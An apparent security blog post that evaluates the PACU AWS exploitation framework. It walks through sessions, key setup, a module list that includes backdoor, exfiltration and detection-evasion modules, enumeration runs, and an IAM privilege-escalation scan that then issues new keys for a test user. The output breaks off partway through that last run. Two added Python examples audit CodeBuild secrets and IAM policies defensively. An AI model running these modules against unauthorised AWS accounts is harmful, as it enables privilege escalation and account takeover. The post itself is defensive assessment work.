Security Odds and Ends

Notes on security-related topics

Trying out PACU, the AWS exploitation framework

These are my notes from testing whether PACU, an AWS exploitation framework, could be put to use in platform assessments.

Conclusion

Its purpose differs from that of a platform assessment, so I concluded it would be difficult to use for one.

Reasons

It is useful for investigating, from a penetration-testing point of view, what attacks become possible once an IAM user's access key and secret access key have leaked, but because it presupposes such a leak, I felt there is little benefit in adding it to a platform assessment.

It can also be used to investigate how far a particular IAM user's permissions reach, but that requires using the access key and secret access key of the employee who has been issued that IAM user, which is not realistic.

Test environment

For this test I installed PACU on Kali Linux.

For installation instructions and command options, see the project's GitHub page: https://github.com/RhinoSecurityLabs/pacu

The list of modules is also on the project's GitHub page.

What was tested

Starting pacu

Start the CLI with the pacu command.

$ pacu
 ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
 ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣤⣶⣿⣿⣿⣿⣿⣿⣶⣄⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
 ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣾⣿⡿⠛⠉⠁⠀⠀⠈⠙⠻⣿⣿⣦⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
 ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠛⠛⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠻⣿⣷⣀⣀⣀⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀
 ⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣤⣤⣤⣤⣤⣤⣤⣤⣀⣀⠀⠀⠀⠀⠀⠀⢻⣿⣿⣿⡿⣿⣿⣷⣦⠀⠀⠀⠀⠀⠀⠀
 ⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣀⣀⣈⣉⣙⣛⣿⣿⣿⣿⣿⣿⣿⣿⡟⠛⠿⢿⣿⣷⣦⣄⠀⠀⠈⠛⠋⠀⠀⠀⠈⠻⣿⣷⠀⠀⠀⠀⠀⠀
 ⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣀⣈⣉⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣧⣀⣀⣀⣤⣿⣿⣿⣷⣦⡀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣆⠀⠀⠀⠀⠀
 ⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣬⣭⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠿⠛⢛⣉⣉⣡⣄⠀⠀⠀⠀⠀⠀⠀⠀⠻⢿⣿⣿⣶⣄⠀⠀
 ⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠟⠋⣁⣤⣶⡿⣿⣿⠉⠻⠏⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⢻⣿⣧⡀
 ⠀⠀⠀⠀⠀⠀⠀⠀⢠⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠟⠋⣠⣶⣿⡟⠻⣿⠃⠈⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢹⣿⣧
 ⢀⣀⣤⣴⣶⣶⣶⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠟⠁⢠⣾⣿⠉⠻⠇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿
 ⠉⠛⠿⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠁⠀⠀⠀⠀⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣸⣿⡟
 ⠀⠀⠀⠀⠉⣻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣾⣿⡟⠁
 ⠀⠀⠀⢀⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣦⣄⡀⠀⠀⠀⠀⠀⣴⣆⢀⣴⣆⠀⣼⣆⠀⠀⣶⣶⣶⣶⣶⣶⣶⣶⣾⣿⣿⠿⠋⠀⠀
 ⠀⠀⠀⣼⣿⣿⣿⠿⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠓⠒⠒⠚⠛⠛⠛⠛⠛⠛⠛⠛⠀⠀⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠀⠀⠀⠀⠀
 ⠀⠀⠀⣿⣿⠟⠁⠀⢸⣿⣿⣿⣿⣿⣿⣿⣶⡀⠀⢠⣾⣿⣿⣿⣿⣿⣿⣷⡄⠀⢀⣾⣿⣿⣿⣿⣿⣿⣷⣆⠀⢰⣿⣿⣿⠀⠀⠀⣿⣿⣿
 ⠀⠀⠀⠘⠁⠀⠀⠀⢸⣿⣿⡿⠛⠛⢻⣿⣿⡇⠀⢸⣿⣿⡿⠛⠛⢿⣿⣿⡇⠀⢸⣿⣿⡿⠛⠛⢻⣿⣿⣿⠀⢸⣿⣿⣿⠀⠀⠀⣿⣿⣿
 ⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⡇⠀⠀⢸⣿⣿⡇⠀⢸⣿⣿⡇⠀⠀⢸⣿⣿⡇⠀⢸⣿⣿⡇⠀⠀⠸⠿⠿⠟⠀⢸⣿⣿⣿⠀⠀⠀⣿⣿⣿
 ⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⡇⠀⠀⢸⣿⣿⡇⠀⢸⣿⣿⡇⠀⠀⢸⣿⣿⡇⠀⢸⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⠀⠀⠀⣿⣿⣿
 ⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣧⣤⣤⣼⣿⣿⡇⠀⢸⣿⣿⣧⣤⣤⣼⣿⣿⡇⠀⢸⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⠀⠀⠀⣿⣿⣿
 ⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣿⣿⣿⣿⡿⠃⠀⢸⣿⣿⣿⣿⣿⣿⣿⣿⡇⠀⢸⣿⣿⡇⠀⠀⢀⣀⣀⣀⠀⢸⣿⣿⣿⠀⠀⠀⣿⣿⣿
 ⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⡏⠉⠉⠉⠉⠀⠀⠀⢸⣿⣿⡏⠉⠉⢹⣿⣿⡇⠀⢸⣿⣿⣇⣀⣀⣸⣿⣿⣿⠀⢸⣿⣿⣿⣀⣀⣀⣿⣿⣿
 ⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⡇⠀⠀⢸⣿⣿⡇⠀⠸⣿⣿⣿⣿⣿⣿⣿⣿⡿⠀⠀⢿⣿⣿⣿⣿⣿⣿⣿⡟
 ⠀⠀⠀⠀⠀⠀⠀⠀⠘⠛⠛⠃⠀⠀⠀⠀⠀⠀⠀⠘⠛⠛⠃⠀⠀⠘⠛⠛⠃⠀⠀⠉⠛⠛⠛⠛⠛⠛⠋⠀⠀⠀⠀⠙⠛⠛⠛⠛⠛⠉⠀

To create a new session, choose 0. In the example below, a new session named pacu is created.

Found existing sessions:
  [0] New session
  [1] test
Choose an option: 0
What would you like to name this new session? pacu
Session pacu created.

To reuse a previous session, enter its number. In the example below, option 1 is chosen to select the session named pacu.

Found existing sessions:
  [0] New session
  [1] pacu
Choose an option: 1

Deleting a session

The delete_session command deletes a session. In the example below, option 0 is chosen to delete the session named pacu.

Pacu (test:test) > delete_session
Delete which session?
  [0] pacu
  [1] test (ACTIVE)
Choose an option: 0
Deleted pacu from the database!
Note that the output folder at ~/.local/share/pacu/sessions/pacu/ will not be deleted. Do it manually if necessary.
Pacu (test:test) >

Listing the command options

The help command displays the available commands and their options.

Pacu (test:test) > help

    Pacu - https://github.com/RhinoSecurityLabs/pacu
    Written and researched by Spencer Gietzen of Rhino Security Labs - https://rhinosecuritylabs.com/

    This was built as a modular, open source tool to assist in penetration testing an AWS environment.
    For usage and developer documentation, please visit the GitHub page.

    Modules that have pre-requisites will have those listed in that modules help info, but if it is
    executed before its pre-reqs have been filled, it will prompt you to run that module then continue
    once that is finished, so you have the necessary data for the module you want to run.

    Pacu command info:
        list/ls                             List all modules
        load_commands_file <file>           Load an existing file with list of commands to execute
        search [cat[egory]] <search term>   Search the list of available modules by name or category
        help                                Display this page of information
        help <module name>                  Display information about a module
        whoami                              Display information regarding to the active access keys
        data                                Display all data that is stored in this session. Only fields
                                              with values will be displayed
        data <service>                      Display all data for a specified service in this session
        services                            Display a list of services that have collected data in the
                                              current session to use with the "data" command
        regions                             Display a list of all valid AWS regions
        update_regions                      Run a script to update the regions database to the newest
                                              version
        set_regions <region> [<region>...]  Set the default regions for this session. These space-separated
                                              regions will be used for modules where regions are required,
                                              but not supplied by the user. The default set of regions is
                                              every supported region for the service. Supply "all" to this
                                              command to reset the region set to the default of all
                                              supported regions
        run/exec <module name>              Execute a module
        set_keys                            Add a set of AWS keys to the session and set them as the
                                              default
        swap_keys                           Change the currently active AWS key to another key that has
                                              previously been set for this session
        import_keys <profile name>|--all    Import AWS keys from the AWS CLI credentials file (located
                                              at ~/.aws/credentials) to the current sessions database.
                                              Enter the name of a profile you would like to import or
                                              supply --all to import all the credentials in the file.
        assume_role <role arn>              Call AssumeRole on the specified role from the current
                                              credentials, add the resulting temporary keys to the Pacu
                                              key database and start using these new credentials.
        export_keys                         Export the active credentials to a profile in the AWS CLI
                                              credentials file (~/.aws/credentials)
        sessions/list_sessions              List all sessions in the Pacu database
        swap_session                        Change the active Pacu session to another one in the database
        delete_session                      Delete a Pacu session from the database. Note that the output
                                              folder for that session will not be deleted

        exit/quit                           Exit Pacu

    Other command info:
        aws <command>                       Run an AWS CLI command directly. Note: If Pacu detects "aws"
                                              as the first word of the command, the whole command will
                                              instead be run in a shell so that you can use the AWS CLI
                                              from within Pacu. Due to the command running in a shell,
                                              this enables you to pipe output where needed. An example
                                              would be to run an AWS CLI command and pipe it into "jq"
                                              to parse the data returned. Warning: The AWS CLI's
                                              authentication is not related to Pacu. Be careful to
                                              ensure that you are using the keys you want when using
                                              the AWS CLI. It is suggested to use AWS CLI profiles
                                              to solve this problem
        console/open_console                Generate a URL that will log the current user/role in to
                                              the AWS web console

Registering an IAM user's keys

Register an access key and secret access key with the set_keys command.

Pacu (pacu:No Keys Set) > set_keys 
Setting AWS Keys...
Press enter to keep the value currently stored.
Enter the letter C to clear the value, rather than set it.
If you enter an existing key_alias, that key's fields will be updated instead of added.

Key alias [None]: pacu
Access key ID [None]: XXXXXX
Secret access key [None]: XXXXXX
Session token (Optional - for temp AWS keys only) [None]: 

Keys saved to database.

Listing the modules

The ls command lists the available modules.

Pacu (test:test) > ls

[Category: ESCALATE]

  iam__privesc_scan
  cfn__resource_injection

[Category: RECON_UNAUTH]

  iam__enum_users
  iam__enum_roles

[Category: EVADE]

  guardduty__whitelist_ip
  cloudtrail__download_event_history
  cloudwatch__download_logs
  detection__enum_services
  waf__enum
  elb__enum_logging
  detection__disruption

[Category: EXFIL]

  s3__download_bucket
  rds__explore_snapshots
  ebs__download_snapshots

[Category: LATERAL_MOVE]

  vpc__enum_lateral_movement
  cloudtrail__csv_injection

[Category: EXPLOIT]

  ec2__startup_shell_script
  lightsail__generate_temp_access
  systemsmanager__rce_ec2
  api_gateway__create_api_keys
  ecs__backdoor_task_def
  lightsail__generate_ssh_keys
  ebs__explore_snapshots
  lightsail__download_ssh_keys

[Category: ENUM]

  ec2__enum
  acm__enum
  apigateway__enum
  iam__enum_permissions
  lightsail__enum
  codebuild__enum
  guardduty__list_findings
  iam__enum_users_roles_policies_groups
  aws__enum_spend
  iam__get_credential_report
  inspector__get_reports
  iam__detect_honeytokens
  cloudformation__download_data
  glue__enum
  ebs__enum_volumes_snapshots
  lambda__enum
  systemsmanager__download_parameters
  dynamodb__enum
  enum__secrets
  ecr__enum
  rds__enum
  guardduty__list_accounts
  ecs__enum
  aws__enum_account
  ecs__enum_task_def
  route53__enum
  ec2__download_userdata
  ec2__check_termination_protection
  iam__bruteforce_permissions

[Category: PERSIST]

  ec2__backdoor_ec2_sec_groups
  lambda__backdoor_new_users
  lambda__backdoor_new_sec_groups
  lambda__backdoor_new_roles
  iam__backdoor_users_keys
  iam__backdoor_users_password
  iam__backdoor_assume_role

codebuild__enum

This module scans CodeBuild for sensitive information such as passwords and API keys.

The command options for codebuild__enum are as follows.

Pacu (pacu:pacu) > help codebuild__enum

codebuild__enum written by Spencer Gietzen of Rhino Security Labs.

usage: pacu [--regions REGIONS] [--builds] [--projects]

This module enumerates all CodeBuild builds and projects, with the goal of finding sensitive information in the
environment variables associated with each one, like passwords, secrets, or API keys.

optional arguments:
  --regions REGIONS  One or more (comma separated) AWS regions in the format "us-east-1". Defaults to all session
                     regions.
  --builds           Enumerate builds. If this is passed in without --projects, then only builds will be
                     enumerated. By default, both are enumerated.
  --projects         Enumerate projects. If this is passed in without --builds, then only projects will be
                     enumerated. By default, both are enumerated.

Since CodeBuild is not in use in this environment, the scan result contains nothing of interest.

Pacu (pacu:pacu) > run codebuild__enum
  Running module codebuild__enum...
Automatically targeting regions:
  ap-northeast-1
  ap-northeast-2
  ap-northeast-3
  ap-south-1
  ap-southeast-1
  ap-southeast-2
  ca-central-1
  eu-central-1
  eu-north-1
  eu-west-1
  eu-west-2
  eu-west-3
  sa-east-1
  us-east-1
  us-east-2
  us-west-1
  us-west-2
Continue? (y/n) y
[codebuild__enum] Starting region ap-northeast-1...
[codebuild__enum] Starting region ap-northeast-2...
[codebuild__enum] Starting region ap-south-1...
[codebuild__enum] Starting region ap-southeast-1...
[codebuild__enum] Starting region ap-southeast-2...
[codebuild__enum] Starting region ca-central-1...
[codebuild__enum] Starting region eu-central-1...
[codebuild__enum] Starting region eu-north-1...
[codebuild__enum] Starting region eu-west-1...
[codebuild__enum] Starting region eu-west-2...
[codebuild__enum] Starting region eu-west-3...
[codebuild__enum] Starting region sa-east-1...
[codebuild__enum] Starting region us-east-1...
[codebuild__enum] Starting region us-east-2...
[codebuild__enum] Starting region us-west-1...
[codebuild__enum] Starting region us-west-2...
[codebuild__enum] codebuild__enum completed.

[codebuild__enum] MODULE SUMMARY:

    All
        0 EnvironmentVariable(s) found.
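
As a defensive counterpart to what codebuild__enum looks for, the following is an added example (my own code, not part of Pacu or of the original post). It audits CodeBuild project definitions for secrets stored as PLAINTEXT environment variables instead of Parameter Store or Secrets Manager references. It assumes the record shape returned by boto3's codebuild.batch_get_projects(); the sample projects, the name hints and the value patterns are constructed for the example.

```python
"""Added example (not Pacu's code): flag CodeBuild environment variables that
hold secrets in PLAINTEXT rather than referencing Parameter Store or Secrets
Manager. The project records below are constructed to mimic the shape of
boto3's codebuild.batch_get_projects() response; nothing was captured from a
real account."""
import re

# Name fragments that usually mark a credential (assumption: tune per environment).
SECRET_NAME_HINTS = ("PASSWORD", "PASSWD", "SECRET", "TOKEN", "API_KEY",
                     "APIKEY", "PRIVATE_KEY", "ACCESS_KEY")

# Value shapes that look like credentials regardless of the variable's name.
SECRET_VALUE_PATTERNS = [
    ("aws_access_key_id", re.compile(r"\bAKIA[0-9A-Z]{16}\b")),
    ("github_token", re.compile(r"\bgh[pousr]_[A-Za-z0-9]{36,}\b")),
    ("private_key", re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----")),
]

# Constructed sample, shaped like the 'projects' list of batch_get_projects().
SAMPLE_PROJECTS = [
    {
        "name": "web-build",
        "environment": {
            "environmentVariables": [
                {"name": "DB_PASSWORD", "value": "hunter2", "type": "PLAINTEXT"},
                {"name": "DB_USER", "value": "app", "type": "PLAINTEXT"},
                # Safe pattern: the value is only a Parameter Store path.
                {"name": "API_TOKEN", "value": "/prod/api/token", "type": "PARAMETER_STORE"},
                # Constructed placeholder value, not a real key.
                {"name": "DEPLOY_KEY", "value": "AKIAEXAMPLEEXAMPLE12", "type": "PLAINTEXT"},
            ]
        },
    },
    {"name": "docs-build", "environment": {"environmentVariables": []}},
]


def audit_project(project):
    """Return a list of (variable name, reason) findings for one project."""
    findings = []
    for var in project.get("environment", {}).get("environmentVariables", []):
        # PARAMETER_STORE and SECRETS_MANAGER references are the safe pattern.
        if var.get("type", "PLAINTEXT") != "PLAINTEXT":
            continue
        name, value = var["name"], str(var.get("value", ""))
        reason = None
        if any(hint in name.upper() for hint in SECRET_NAME_HINTS):
            reason = "secret-like name stored as PLAINTEXT"
        for label, pattern in SECRET_VALUE_PATTERNS:
            if pattern.search(value):
                reason = f"value matches {label} pattern"
                break
        if reason:
            findings.append((name, reason))
    return findings


def audit_projects(projects):
    """Map project name -> findings, omitting projects with none."""
    report = {}
    for project in projects:
        findings = audit_project(project)
        if findings:
            report[project["name"]] = findings
    return report


if __name__ == "__main__":
    for project_name, items in audit_projects(SAMPLE_PROJECTS).items():
        for name, reason in items:
            print(f"{project_name}: {name}: {reason}")
```

To run this against a real account, replace SAMPLE_PROJECTS with the `projects` list from `batch_get_projects(names=...)` in each region; the remediation for every hit is the same, moving the value into Parameter Store or Secrets Manager and switching the variable `type` accordingly.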

vpc__enum_lateral_movement

This module checks whether other networks can be reached via VPN or VPC Peering.

The command options for vpc__enum_lateral_movement are as follows.

Pacu (pacu:pacu) > help vpc__enum_lateral_movement

vpc__enum_lateral_movement written by Chris Farris <chris@room17.com>.

usage: pacu [--versions-all]

Looks for DirectConnect, VPN or VPC Peering to understand where you can go once you compromise an instance inside a
VPC.

optional arguments:
  --versions-all  Grab all versions instead of just the latest

Since neither VPN nor VPC Peering is in use in this environment, the scan result contains nothing of interest.

Pacu (pacu:pacu) > run vpc__enum_lateral_movement
  Running module vpc__enum_lateral_movement...
[vpc__enum_lateral_movement] Starting region ap-northeast-1...
[vpc__enum_lateral_movement]   Enumerating DirectConnect
[vpc__enum_lateral_movement]   Enumerating VPNs
[vpc__enum_lateral_movement]   Enumerating Peering
[vpc__enum_lateral_movement] Starting region ap-northeast-2...
[vpc__enum_lateral_movement]   Enumerating DirectConnect
[vpc__enum_lateral_movement]   Enumerating VPNs
[vpc__enum_lateral_movement]   Enumerating Peering
[vpc__enum_lateral_movement] Starting region ap-northeast-3...
[vpc__enum_lateral_movement]   Enumerating DirectConnect
[vpc__enum_lateral_movement]   Enumerating VPNs
[vpc__enum_lateral_movement]   Enumerating Peering
[vpc__enum_lateral_movement] Starting region ap-south-1...
[vpc__enum_lateral_movement]   Enumerating DirectConnect
[vpc__enum_lateral_movement]   Enumerating VPNs
[vpc__enum_lateral_movement]   Enumerating Peering
[vpc__enum_lateral_movement] Starting region ap-southeast-1...
[vpc__enum_lateral_movement]   Enumerating DirectConnect
[vpc__enum_lateral_movement]   Enumerating VPNs
[vpc__enum_lateral_movement]   Enumerating Peering
[vpc__enum_lateral_movement] Starting region ap-southeast-2...
[vpc__enum_lateral_movement]   Enumerating DirectConnect
[vpc__enum_lateral_movement]   Enumerating VPNs
[vpc__enum_lateral_movement]   Enumerating Peering
[vpc__enum_lateral_movement] Starting region ca-central-1...
[vpc__enum_lateral_movement]   Enumerating DirectConnect
[vpc__enum_lateral_movement]   Enumerating VPNs
[vpc__enum_lateral_movement]   Enumerating Peering
[vpc__enum_lateral_movement] Starting region eu-central-1...
[vpc__enum_lateral_movement]   Enumerating DirectConnect
[vpc__enum_lateral_movement]   Enumerating VPNs
[vpc__enum_lateral_movement]   Enumerating Peering
[vpc__enum_lateral_movement] Starting region eu-north-1...
[vpc__enum_lateral_movement]   Enumerating DirectConnect
[vpc__enum_lateral_movement]   Enumerating VPNs
[vpc__enum_lateral_movement]   Enumerating Peering
[vpc__enum_lateral_movement] Starting region eu-west-1...
[vpc__enum_lateral_movement]   Enumerating DirectConnect
[vpc__enum_lateral_movement]   Enumerating VPNs
[vpc__enum_lateral_movement]   Enumerating Peering
[vpc__enum_lateral_movement] Starting region eu-west-2...
[vpc__enum_lateral_movement]   Enumerating DirectConnect
[vpc__enum_lateral_movement]   Enumerating VPNs
[vpc__enum_lateral_movement]   Enumerating Peering
[vpc__enum_lateral_movement] Starting region eu-west-3...
[vpc__enum_lateral_movement]   Enumerating DirectConnect
[vpc__enum_lateral_movement]   Enumerating VPNs
[vpc__enum_lateral_movement]   Enumerating Peering
[vpc__enum_lateral_movement] Starting region sa-east-1...
[vpc__enum_lateral_movement]   Enumerating DirectConnect
[vpc__enum_lateral_movement]   Enumerating VPNs
[vpc__enum_lateral_movement]   Enumerating Peering
[vpc__enum_lateral_movement] Starting region us-east-1...
[vpc__enum_lateral_movement]   Enumerating DirectConnect
[vpc__enum_lateral_movement]   Enumerating VPNs
[vpc__enum_lateral_movement]   Enumerating Peering
[vpc__enum_lateral_movement] Starting region us-east-2...
[vpc__enum_lateral_movement]   Enumerating DirectConnect
[vpc__enum_lateral_movement]   Enumerating VPNs
[vpc__enum_lateral_movement]   Enumerating Peering
[vpc__enum_lateral_movement] Starting region us-west-1...
[vpc__enum_lateral_movement]   Enumerating DirectConnect
[vpc__enum_lateral_movement]   Enumerating VPNs
[vpc__enum_lateral_movement]   Enumerating Peering
[vpc__enum_lateral_movement] Starting region us-west-2...
[vpc__enum_lateral_movement]   Enumerating DirectConnect
[vpc__enum_lateral_movement]   Enumerating VPNs
[vpc__enum_lateral_movement]   Enumerating Peering
[vpc__enum_lateral_movement] vpc__enum_lateral_movement completed.

[vpc__enum_lateral_movement] MODULE SUMMARY:

  0 Direct Connect Gateways found.
  0 VPNs found.
  0 Peering Connections found.
  0 new VPCs were found.
  2 VPCs are now known.

iam__privesc_scan

This module scans what the IAM user's permissions allow, i.e. which privilege-escalation methods are available to it.

The command options for iam__privesc_scan are as follows.

Pacu (pacu:pacu) > help iam__privesc_scan

iam__privesc_scan written by Spencer Gietzen of Rhino Security Labs.

Prerequisite Module(s): ['iam__enum_permissions', 'iam__enum_users_roles_policies_groups', 'iam__backdoor_users_keys', 'iam__backdoor_users_password', 'iam__backdoor_assume_role', 'glue__enum', 'lambda__enum']

usage: pacu [--offline] [--folder FOLDER] [--scan-only]

This module will scan for permission misconfigurations to see where privilege escalation will be possible.
Available attack paths will be presented to the user and executed on if chosen. Warning: Due to the implementation
in IAM policies, this module has a difficult time parsing "NotActions". If your user has any NotActions associated
with them, it is recommended to manually verify the results of this module. NotActions are noted with a "!"
preceeding the action when viewing the results of the "whoami" command. For more information on what NotActions
are, visit the following link:
https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_elements_notaction.html

optional arguments:
  --offline        By passing this argument, this module will not make an API calls. If offline mode is enabled,
                   you need to pass a file path to a folder that contains JSON files of the different users,
                   policies, groups, and/or roles in the account using the --folder argument. This module will
                   scan those JSON policy files to identify users, groups, and roles that have overly permissive
                   policies.
  --folder FOLDER  A file path pointing to a folder full of JSON files containing policies and connections between
                   users, groups, and/or roles in an AWS account. The module "iam__enum_permissions" with the "--
                   all-users" flag outputs the exact format required for this feature to
                   ~/.local/share/pacu/sessions/[current_session_name]/downloads/confirmed_permissions/.
  --scan-only      Only run the scan to check for possible escalation methods, don't attempt any found methods.

With the --scan-only option, only the scan is run. The prerequisite iam__enum_permissions module is also run.

Pacu (pacu:pacu) > run iam__privesc_scan --scan-only
  Running module iam__privesc_scan...
[iam__privesc_scan] No permissions detected yet.
[iam__privesc_scan] Data (Current User/Role > Permissions) not found, run module "iam__enum_permissions" to fetch it? (y/n) y
[iam__privesc_scan]   Running module iam__enum_permissions...
[iam__enum_permissions] Confirming permissions for users:
[iam__enum_permissions]   pacu...
[iam__enum_permissions]     Confirmed Permissions for pacu
[iam__enum_permissions] iam__enum_permissions completed.

[iam__enum_permissions] MODULE SUMMARY:

  Confirmed permissions for user: pacu.
  Confirmed permissions for 0 role(s).

[iam__privesc_scan] Escalation methods for current user:
[iam__privesc_scan]   CONFIRMED: CreateNewPolicyVersion
[iam__privesc_scan]   CONFIRMED: SetExistingDefaultPolicyVersion
[iam__privesc_scan]   CONFIRMED: CreateAccessKey
[iam__privesc_scan]   CONFIRMED: CreateLoginProfile
[iam__privesc_scan]   CONFIRMED: UpdateLoginProfile
[iam__privesc_scan]   CONFIRMED: AttachUserPolicy
[iam__privesc_scan]   CONFIRMED: AttachGroupPolicy
[iam__privesc_scan]   CONFIRMED: PutUserPolicy
[iam__privesc_scan]   CONFIRMED: PutGroupPolicy
[iam__privesc_scan]   CONFIRMED: AddUserToGroup

[iam__privesc_scan] iam__privesc_scan completed.

[iam__privesc_scan] MODULE SUMMARY:

  Scan Complete
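
The same check can be done from the policy side before anything is leaked. The following is an added example (my own code, not Pacu's implementation and not part of the original post) that scans an IAM policy document for the escalation methods the run above reported as CONFIRMED. The mapping from method names to IAM actions and both sample policies are assumptions of the example; Resource and Condition elements are deliberately ignored, and NotAction statements are reported separately because, as the module's help text warns, they are easy to misread.

```python
"""Added example (not Pacu's code): scan an IAM policy document for the
escalation-relevant actions that iam__privesc_scan reported above. The
method-to-action mapping and both sample policies are constructed; Resource and
Condition elements are ignored on purpose (confirm hits with
iam:SimulatePrincipalPolicy or IAM Access Analyzer)."""
import fnmatch
import json

# Method names as printed by iam__privesc_scan, mapped to the IAM action each
# one relies on (assumed mapping, derived from the method names).
ESCALATION_ACTIONS = {
    "CreateNewPolicyVersion": "iam:CreatePolicyVersion",
    "SetExistingDefaultPolicyVersion": "iam:SetDefaultPolicyVersion",
    "CreateAccessKey": "iam:CreateAccessKey",
    "CreateLoginProfile": "iam:CreateLoginProfile",
    "UpdateLoginProfile": "iam:UpdateLoginProfile",
    "AttachUserPolicy": "iam:AttachUserPolicy",
    "AttachGroupPolicy": "iam:AttachGroupPolicy",
    "PutUserPolicy": "iam:PutUserPolicy",
    "PutGroupPolicy": "iam:PutGroupPolicy",
    "AddUserToGroup": "iam:AddUserToGroup",
}

# Constructed sample: a broad iam:Create* grant, an explicit Deny and a NotAction
# statement, so every status kind shows up.
SAMPLE_POLICY = json.loads("""
{
  "Version": "2012-10-17",
  "Statement": [
    {"Effect": "Allow", "Action": ["iam:Create*", "iam:AddUserToGroup"], "Resource": "*"},
    {"Effect": "Allow", "Action": "iam:Get*", "Resource": "*"},
    {"Effect": "Deny",  "Action": "iam:CreateLoginProfile", "Resource": "*"},
    {"Effect": "Allow", "NotAction": ["iam:*", "organizations:*"], "Resource": "*"}
  ]
}
""")

# Constructed: an Allow whose NotAction does not exclude iam, so it grants all of IAM.
NOTACTION_POLICY = {
    "Version": "2012-10-17",
    "Statement": {"Effect": "Allow", "NotAction": "s3:*", "Resource": "*"},
}


def _as_list(value):
    """IAM allows a single string or a list in most elements; normalise to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _matches(pattern, action):
    """IAM action matching is case-insensitive and supports * and ? wildcards."""
    return fnmatch.fnmatchcase(action.lower(), pattern.lower())


def scan_policy(policy):
    """Map each escalation method to 'allowed', 'denied', 'not granted' or
    'allowed via NotAction (verify manually)' under this policy document."""
    statements = _as_list(policy.get("Statement"))
    report = {}
    for method, action in ESCALATION_ACTIONS.items():
        allowed = denied = via_notaction = False
        for st in statements:
            if "NotAction" in st:
                # NotAction covers every action that is NOT listed.
                covered = not any(_matches(p, action) for p in _as_list(st["NotAction"]))
            else:
                covered = any(_matches(p, action) for p in _as_list(st.get("Action")))
            if not covered:
                continue
            if st.get("Effect") == "Deny":
                denied = True
            elif st.get("Effect") == "Allow":
                allowed = True
                via_notaction = via_notaction or "NotAction" in st
        if denied:
            report[method] = "denied"  # an explicit Deny always wins in IAM
        elif allowed and via_notaction:
            report[method] = "allowed via NotAction (verify manually)"
        elif allowed:
            report[method] = "allowed"
        else:
            report[method] = "not granted"
    return report


def escalation_paths(policy):
    """Sorted list of methods the policy grants (including NotAction hits)."""
    return sorted(m for m, s in scan_policy(policy).items() if s.startswith("allowed"))


if __name__ == "__main__":
    for method, status in scan_policy(SAMPLE_POLICY).items():
        print(f"{method:32} {status}")
```

Any of these actions granted to an ordinary user is a finding in its own right; scoping them to the caller's own user ARN, or removing them in favour of a permissions boundary, closes the paths the module exploited in the next run.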

In the run below, a new access key and secret access key are issued for the IAM user (test). The prerequisite iam__enum_users_roles_policies_groups module is also run.

Pacu (pacu:pacu) > run iam__privesc_scan
  Running module iam__privesc_scan...
[iam__privesc_scan] Escalation methods for current user:
[iam__privesc_scan]   CONFIRMED: CreateNewPolicyVersion
[iam__privesc_scan]   CONFIRMED: SetExistingDefaultPolicyVersion
[iam__privesc_scan]   CONFIRMED: CreateAccessKey
[iam__privesc_scan]   CONFIRMED: CreateLoginProfile
[iam__privesc_scan]   CONFIRMED: UpdateLoginProfile
[iam__privesc_scan]   CONFIRMED: AttachUserPolicy
